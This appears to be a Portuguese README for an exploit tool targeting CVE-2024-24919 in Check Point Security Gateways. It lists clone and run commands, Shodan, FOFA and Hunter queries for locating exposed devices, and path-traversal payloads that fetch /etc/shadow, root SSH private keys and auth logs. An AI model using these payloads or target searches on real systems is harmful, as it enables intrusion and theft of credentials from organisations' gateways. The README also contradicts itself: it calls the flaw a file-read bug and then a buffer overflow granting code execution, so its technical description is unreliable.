
CVE-2024-24919 exploit
Este repositório contém uma ferramenta para explorar a vulnerabilidade CVE-2024-24919 em Check Point Security Gateways. A ferramenta é um multi-escâner que pode identificar dispositivos vulneráveis e um exploit de alvo único que pode assumir o controle total do dispositivo afetado.
CVE-2024-24919 é uma vulnerabilidade de divulgação de informações de alta gravidade que permite a um invasor ler arquivos arbitrários remotamente em um Check Point Security Gateway. Esta vulnerabilidade pode ser explorada para roubar informações sensíveis, como senhas e arquivos de configuração.
Aviso Legal:
Esta ferramenta é fornecida apenas para fins educacionais. Não deve ser usada para atacar sistemas vulneráveis sem o consentimento explícito do proprietário. Os autores desta ferramenta não se responsabilizam por quaisquer danos que possam resultar do seu uso.
O exploit funciona enviando uma solicitação HTTP especialmente criada para o dispositivo vulnerável. A solicitação desencadeia um estouro de buffer no firmware do dispositivo, o que permite ao invasor executar código arbitrário. O exploit pode então ser usado para assumir o controle total do dispositivo.
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
Você pode escanear um único alvo ou múltiplos!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ Caminhos da ferramenta : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```